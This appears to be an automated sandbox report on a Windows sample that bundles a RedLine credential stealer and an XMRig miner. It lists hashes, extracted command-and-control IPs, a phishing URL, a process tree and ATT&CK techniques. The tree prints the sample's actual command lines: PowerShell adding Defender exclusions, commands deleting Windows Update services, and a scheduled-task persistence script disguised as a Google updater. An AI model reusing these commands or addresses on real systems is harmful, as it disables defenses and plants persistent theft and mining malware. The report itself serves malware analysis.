Analysis
-
max time kernel
150s -
max time network
153s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
-
submitted
25-10-2022 16:41
General
-
Target
file.exe
-
Size
724KB
-
MD5
06469b7e7904c634cdab3d3fe18a9ad3
-
SHA1
bbeb65a0bd4bbf7a87e0303aee2d9a3dd7c69ef7
-
SHA256
fddc8f5a6d7dd5a4bab21291d07cf528e940bf138d53c70eadaf97152282b734
-
SHA512
3bcd23caa950b8fb06b9543de154a43263e125487bb3e033ad19f8ab66392cb5c6426b6b7f06080342ec0448a5578c1567d60366d976c3f0624627f3a087671e
-
SSDEEP
12288:qQBRuwkLNx0mf0ZjwQsn7uFURmtEif3w74COR0oq7yGOVVuyUq0SWo0MLoimPMFP:qQBRtkLNx0I0Z9EivwECORR8Bo0MLQEp
Malware Config
Extracted
redline
LogsDiller Cloud (TG: @logsdillabot)
51.89.201.21:7161
-
auth_value
3a050df92d0cf082b2cdaf87863616be
Extracted
redline
875784825
79.137.192.6:8362
Signatures
-
Modifies security service 2 TTPs 5 IoCs
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 3 IoCs
-
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 4 IoCs
-
XMRig Miner payload 2 IoCs
-
Blocklisted process makes network request 1 IoCs
-
Downloads MZ/PE file
-
Drops file in Drivers directory 2 IoCs
-
Executes dropped EXE 7 IoCs
-
Stops running service(s) 3 TTPs
-
UPX packed file 2 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
Checks BIOS information in registry 2 TTPs 8 IoCs
BIOS information is often read in order to detect sandboxing environments.
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
-
Identifies Wine through registry keys 2 TTPs 2 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
-
Themida packer 21 IoCs
Detects Themida, an advanced Windows software protection system.
-
Uses the VBS compiler for execution 1 TTPs
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 1 IoCs
-
Checks whether UAC is enabled 1 TTPs 2 IoCs
-
Drops file in System32 directory 3 IoCs
-
Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs
-
Suspicious use of SetThreadContext 6 IoCs
-
Drops file in Program Files directory 6 IoCs
-
Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Enumerates system info in registry 2 TTPs 3 IoCs
-
Modifies data under HKEY_USERS 64 IoCs
-
Modifies registry class 2 IoCs
-
Script User-Agent 1 IoCs
Uses user-agent string associated with script host/environment.
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: LoadsDriver 1 IoCs
-
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of FindShellTrayWindow 3 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\file.exe"C:\Users\Admin\AppData\Local\Temp\file.exe"1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"2⤵
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://bestrealprizes.life/?u=lq1pd08&o=hdck0gl3⤵
- Adds Run key to start application
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffde03b46f8,0x7ffde03b4708,0x7ffde03b47184⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2100,16713514962216666211,11044630680083977700,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2116 /prefetch:24⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2100,16713514962216666211,11044630680083977700,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2444 /prefetch:34⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2100,16713514962216666211,11044630680083977700,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3328 /prefetch:84⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,16713514962216666211,11044630680083977700,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3784 /prefetch:14⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,16713514962216666211,11044630680083977700,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3792 /prefetch:14⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2100,16713514962216666211,11044630680083977700,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5324 /prefetch:84⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,16713514962216666211,11044630680083977700,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5436 /prefetch:14⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,16713514962216666211,11044630680083977700,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4160 /prefetch:14⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,16713514962216666211,11044630680083977700,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5576 /prefetch:14⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2100,16713514962216666211,11044630680083977700,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5400 /prefetch:84⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,16713514962216666211,11044630680083977700,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5492 /prefetch:14⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,16713514962216666211,11044630680083977700,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3956 /prefetch:14⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2100,16713514962216666211,11044630680083977700,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6240 /prefetch:84⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --configure-user-settings --verbose-logging --system-level --msedge --force-configure-user-settings4⤵
- Drops file in Program Files directory
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x220,0x224,0x228,0x1fc,0x22c,0x7ff625bd5460,0x7ff625bd5470,0x7ff625bd54805⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2100,16713514962216666211,11044630680083977700,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6240 /prefetch:84⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2100,16713514962216666211,11044630680083977700,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1872 /prefetch:84⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2100,16713514962216666211,11044630680083977700,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1888 /prefetch:84⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2100,16713514962216666211,11044630680083977700,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1888 /prefetch:84⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2100,16713514962216666211,11044630680083977700,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1692 /prefetch:84⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2100,16713514962216666211,11044630680083977700,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2672 /prefetch:84⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2100,16713514962216666211,11044630680083977700,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6212 /prefetch:84⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2100,16713514962216666211,11044630680083977700,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6380 /prefetch:84⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2100,16713514962216666211,11044630680083977700,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6232 /prefetch:84⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2100,16713514962216666211,11044630680083977700,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2672 /prefetch:24⤵
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\se21t2up.vbs"3⤵
- Blocklisted process makes network request
-
C:\Users\Admin\AppData\Local\Temp\setu2p.exe"C:\Users\Admin\AppData\Local\Temp\setu2p.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\setup.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Drops file in Drivers directory
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Program Files directory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\cmd.execmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f6⤵
-
C:\Windows\system32\sc.exesc stop UsoSvc7⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop WaaSMedicSvc7⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop wuauserv7⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop bits7⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop dosvc7⤵
- Launches sc.exe
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f7⤵
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f7⤵
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f7⤵
- Modifies security service
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f7⤵
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f7⤵
-
C:\Windows\SYSTEM32\cmd.execmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 06⤵
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-ac 07⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-dc 07⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-ac 07⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-dc 07⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell <#tnsgzmlqv#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell <#lkntrxaxo#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }6⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC7⤵
-
C:\Users\Admin\AppData\Local\Temp\setup23.exe"C:\Users\Admin\AppData\Local\Temp\setup23.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Executes dropped EXE
- Checks BIOS information in registry
- Checks computer location settings
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /TN Cache-S-21-2946144819-3e21f723 /TR "C:\Users\Admin\AppData\Local\cache\MoUSO.exe"6⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Local\Temp\setup2321.exe"C:\Users\Admin\AppData\Local\Temp\setup2321.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"6⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"6⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"6⤵
-
C:\Users\Admin\AppData\Local\Temp\watchdog.exe"C:\Users\Admin\AppData\Local\Temp\watchdog.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"6⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Program Files\Google\Chrome\updater.exe"C:\Program Files\Google\Chrome\updater.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Drops file in Drivers directory
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell <#tnsgzmlqv#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\cmd.execmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵
-
C:\Windows\system32\cmd.execmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f2⤵
-
C:\Windows\system32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop bits3⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop dosvc3⤵
- Launches sc.exe
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f3⤵
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f3⤵
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f3⤵
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f3⤵
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f3⤵
-
C:\Windows\system32\conhost.exeC:\Windows\system32\conhost.exe dusipgdp2⤵
-
C:\Windows\system32\cmd.execmd /c mkdir "C:\Program Files\Google\Libs\" & wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"3⤵
- Drops file in Program Files directory
-
C:\Windows\system32\cmd.execmd /c mkdir "C:\Program Files\Google\Libs\" & wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"2⤵
- Drops file in Program Files directory
-
C:\Windows\System32\Wbem\WMIC.exewmic PATH Win32_VideoController GET Name, VideoProcessor3⤵
-
C:\Windows\system32\conhost.exeC:\Windows\system32\conhost.exe yvlyxjfdxdcidxwf GoySvqjslEz2cJjLp/l+rjzn6ce4jALjhSdARaKlIdOzscb8uSA4DC45OD1DpPEqiKy9RognxgdgL26xl6pHcgBuSDH82m22H2uTx/gYzO827+5kpstbfmCCWwx/haNMZTpvRN2AWJn3nj807NkQH/uc5YsiTBf742xyjDXcUT/RYfnhcLyzybIWgXn+7JafUmbaP5sh35EaxsiGFShuRY1L5Fi1uvVZnjU0an3bePXHEXYChHiocVdekR4gVKAc85wY8WomQkvNXfo8OnI8G68t0jyGDhrkDKs7kWaJz2DMj5MokwVvSUi2Y2TsrAP/8HOYVji2aTn31s7dz3/WlCN+UmM7HFUgStV0krKswFnOvNVFJHtjMrdLvilnrbVN4TalQD/4emuEzW66JneW1pmYVvkjJN4HofKGCqATpWU9EnXlzYLkPxSmgsIYJU042⤵
-
C:\Windows\system32\sc.exesc stop UsoSvc1⤵
- Launches sc.exe
-
C:\Users\Admin\AppData\Local\cache\MoUSO.exeC:\Users\Admin\AppData\Local\cache\MoUSO.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Executes dropped EXE
- Checks BIOS information in registry
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
Network
MITRE ATT&CK Enterprise v6
Persistence
Modify Existing Service
2Registry Run Keys / Startup Folder
1Scheduled Task
1Defense Evasion
Impair Defenses
1Modify Registry
2Scripting
1Virtualization/Sandbox Evasion
2Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Program Files\Google\Chrome\updater.exeFilesize
7.1MB
MD53c307d96de8b5ae76bd3b331aa4a81d5
SHA135d314121f180ea37dfdebc28c463f2d21bf1be3
SHA25677e8ce0b2cdea0703a8c29af3656baeacf141add0fe7bba671040c1c552fbda7
SHA5120a7bf0fcc847564177bf888b5e271c109b64dcf860f85af3d58e1d9f4431ec58927bf14aef09d51c17b441b65215d4d269e863b7610f73278daca2114089ce14
-
C:\Program Files\Google\Chrome\updater.exeFilesize
7.1MB
MD53c307d96de8b5ae76bd3b331aa4a81d5
SHA135d314121f180ea37dfdebc28c463f2d21bf1be3
SHA25677e8ce0b2cdea0703a8c29af3656baeacf141add0fe7bba671040c1c552fbda7
SHA5120a7bf0fcc847564177bf888b5e271c109b64dcf860f85af3d58e1d9f4431ec58927bf14aef09d51c17b441b65215d4d269e863b7610f73278daca2114089ce14
-
